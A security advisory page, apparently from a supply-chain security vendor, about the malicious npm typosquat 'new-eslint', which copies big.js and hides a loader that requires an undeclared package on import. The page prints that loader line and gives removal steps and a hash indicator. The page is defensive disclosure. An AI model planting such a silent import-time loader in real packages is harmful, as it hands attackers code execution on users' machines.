Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

new-eslintnpm

Malicious code in new-eslint (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6224
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall new-eslint

What this malware does

Package is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js, with a hidden loader injected mid-file between P.minus and P.mod in both big.js:605 and big.mjs:605: const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. This require fires whenever a consumer imports or requires the package and silently swallows all errors. The required package ts-eslint-helper is not declared in package.json — the manifest lists a different package, [email protected] — so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: classic typosquat lure plus hidden remote-controlled loader. Whatever ts-eslint-helper.from_str() does runs in the installer's process on import with no advertised functionality justifying it.

Malicious versions

1 flagged
7.0.5

Indicators of compromise (SHA-256)

6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25

Frequently asked questions

No. new-eslint on npm has been identified as a malicious package (version 7.0.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007067

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
new-eslint (npm) malicious package — MAL-2026-6224 | O3 Security